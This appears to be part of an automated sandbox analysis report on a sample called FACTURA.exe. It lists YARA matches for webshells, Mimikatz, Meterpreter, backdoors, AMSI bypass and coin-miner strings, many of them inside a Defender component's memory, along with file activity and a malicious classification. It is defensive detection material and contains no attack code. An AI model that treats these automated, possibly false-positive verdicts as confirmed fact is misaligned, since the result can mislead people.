Source: 00000024.00000003.6328572357.00000197A4180000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp, type: MEMORY Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp, type: MEMORY Matched rule: CVE_2018_4878_0day_ITW Description = This signature is mostly public sourced and detects an in-the-wild exploit for CVE-2018-4878., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000024.00000003.6334441396.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_PowerShell_IEX_Download_Combo date = 2018-10-04, hash1 = 13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_generic date = 2021/01/14, author = Arnim Rupp, description = php webshell having some kind of input and some kind of payload. restricted to small files or big ones inclusing suspicious strings, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = bee1b76b1455105d4bfe2f45191071cf05e83a309ae9defcf759248ca9bceddd
Source: 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_generic_eval date = 2021/01/07, author = Arnim Rupp, description = Generic PHP webshell which uses any eval/exec function in the same line with user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 90c5cc724ec9cf838e4229e5e08955eec4d7bf95
Source: 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp, type: MEMORY Matched rule: ChinaChopper_Generic date = 2015/03/10, author = Florian Roth, description = China Chopper Webshells - PHP and ASPX, reference = https://www.fireeye.com/content/dam/legacy/resources/pdfs/fireeye-china-chopper-report.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000024.00000003.6278908021.00000197A4866000.00000004.00000001.sdmp, type: MEMORY Matched rule: WScriptShell_Case_Anomaly date = 2017-09-11, author = Florian Roth, description = Detects obfuscated wscript.shell commands, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6316787263.00000197A40EC000.00000004.00000001.sdmp, type: MEMORY Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
Source: 00000024.00000003.6287839327.00000197A4D21000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 00000024.00000003.6273910781.00000197A3D92000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6273910781.00000197A3D92000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6342326827.00000197A41F5000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6434024184.00000197A433E000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoldDragon_Aux_File date = 2018-02-03, author = Florian Roth, description = Detects export from Gold Dragon - February 2018, reference = https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6434024184.00000197A433E000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6304991595.00000197A4237000.00000004.00000001.sdmp, type: MEMORY Matched rule: HackTool_Samples description = Hacktool, score =
Source: 00000024.00000003.6304991595.00000197A4237000.00000004.00000001.sdmp, type: MEMORY Matched rule: PS_AMSI_Bypass date = 2017-07-19, author = Florian Roth, description = Detects PowerShell AMSI Bypass, reference = https://gist.github.com/mattifestation/46d6a2ebb4a1f4f0e7229503dc012ef1, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = file
Source: 00000024.00000003.6301296808.00000197A4FB5000.00000004.00000001.sdmp, type: MEMORY Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000024.00000003.6301296808.00000197A4FB5000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6406830616.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6406830616.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6436059336.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000024.00000003.6436059336.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6432826435.00000197A3C46000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_PowerShell_IEX_Download_Combo date = 2018-10-04, hash1 = 13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 00000024.00000003.6432826435.00000197A3C46000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6289913928.00000197A39B3000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6317874324.00000197A4F72000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 00000024.00000003.6317874324.00000197A4F72000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6317874324.00000197A4F72000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6317874324.00000197A4F72000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6288930033.00000197A47A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 00000024.00000003.6308756420.00000197A3F60000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6338624600.00000197A45E4000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6338624600.00000197A45E4000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000024.00000003.6352553916.00000197A34AB000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: Msfpayloads_msf_psh date = 2017-02-09, hash1 = 5cc6c7f1aa75df8979be4a16e36cece40340c6e192ce527771bdd6463253e46f, author = Florian Roth, description = Metasploit Payloads - file msf-psh.vba, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: Keylogger_CN_APT date = 2016-03-07, author = Florian Roth, description = Keylogger - generic rule for a Chinese variant, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 3efb3b5be39489f19d83af869f11a8ef8e9a09c3c7c0ad84da31fc45afcf06e7
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: REDLEAVES_CoreImplant_UniqueStrings author = USG, description = Strings identifying the core REDLEAVES RAT in its deobfuscated state, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: PLUGX_RedLeaves date = 2017-04-03, author = US-CERT Code Analysis Team, MD5_5 = 566291B277534B63EAFC938CDAAB8A399E41AF7D, description = Detects specific RedLeaves and PlugX binaries, MD5_1 = 598FF82EA4FB52717ACAFB227C83D474, MD5_2 = 7D10708A518B26CC8C3CBFBAA224E032, MD5_3 = AF406D35C77B1E0DF17F839E36BCE630, MD5_4 = 6EB9E889B091A5647F6095DCD4DE7C83, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, incident = 10118538
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: WindowsCredentialEditor threat_level = , description = Windows Credential Editor
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Deletes files inside the Windows folder
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe File deleted: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\1.1.18500.10_to_1.1.18600.4_mpengine.dll._p Jump to behavior
Creates files inside the system directory
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4 Jump to behavior
PE file contains executable resources (Code or Archives)
Source: MpAsDesc.dll.mui18.45.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
PE file does not import any functions
Source: MpAsDesc.dll.mui2.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui5.45.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui18.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui34.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui24.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui11.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui21.45.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui8.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui31.45.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.45.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui15.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui8.45.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui5.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui14.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui17.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui27.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui37.45.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui5.45.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui8.45.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui12.45.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui2.45.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui20.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui2.45.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui.45.dr Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui1.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui16.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui39.45.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui4.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui0.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui29.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui22.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui32.45.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui7.45.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui0.45.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui17.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui10.45.dr Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui2.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui1.45.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui3.45.dr Static PE information: No import functions for PE file found
Source: MsMpLics.dll.45.dr Static PE information: No import functions for PE file found
Source: mpasdlta.vdm.35.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui1.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui28.45.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui10.45.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui16.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui7.45.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui33.45.dr Static PE information: No import functions for PE file found
Source: mpavbase.vdm.36.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui11.45.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui9.45.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui14.45.dr Static PE information: No import functions for PE file found
Source: MsMpLics.dll0.45.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui1.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui6.45.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui10.45.dr Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui0.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui20.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui40.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui9.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui15.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui35.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui38.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui18.45.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui6.45.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll0.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui43.45.dr Static PE information: No import functions for PE file found
Source: mpasbase.vdm.36.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui9.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui23.45.dr Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui3.45.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui7.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui26.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui36.45.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui0.45.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui3.45.dr Static PE information: No import functions for PE file found
Source: mpavdlta.vdm.35.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui19.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui3.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui12.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui42.45.dr Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui4.45.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui19.45.dr Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui.45.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui4.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui4.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui30.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui25.45.dr Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui5.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui41.45.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui13.45.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui6.45.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui13.45.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: FACTURA.exe, 00000001.00000000.2845557618.000000000041B000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameCounterfoil7.exe vs FACTURA.exe
Source: FACTURA.exe, 00000001.00000000.2904734110.0000000002AE0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameCounterfoil7.exeFE2XCollides Systems, Inc. vs FACTURA.exe
Enables security privileges
Source: C:\Windows\System32\wevtutil.exe Process token adjusted: Security Jump to behavior
Yara detected Winexe tool
Source: Yara match File source: 36.3.MpSigStub.exe.197a3279566.201.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a327ab6a.200.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a31af2c4.73.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a31af2c4.167.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a31aed77.165.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a31ae82a.166.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a31aed77.74.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a31ae82a.75.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a31eb36e.135.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Source: FACTURA.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\FACTURA.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: classification engine Classification label: mal100.rans.spre.troj.spyw.expl.evad.mine.winEXE@13/235@1/0
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: winhost.vbp
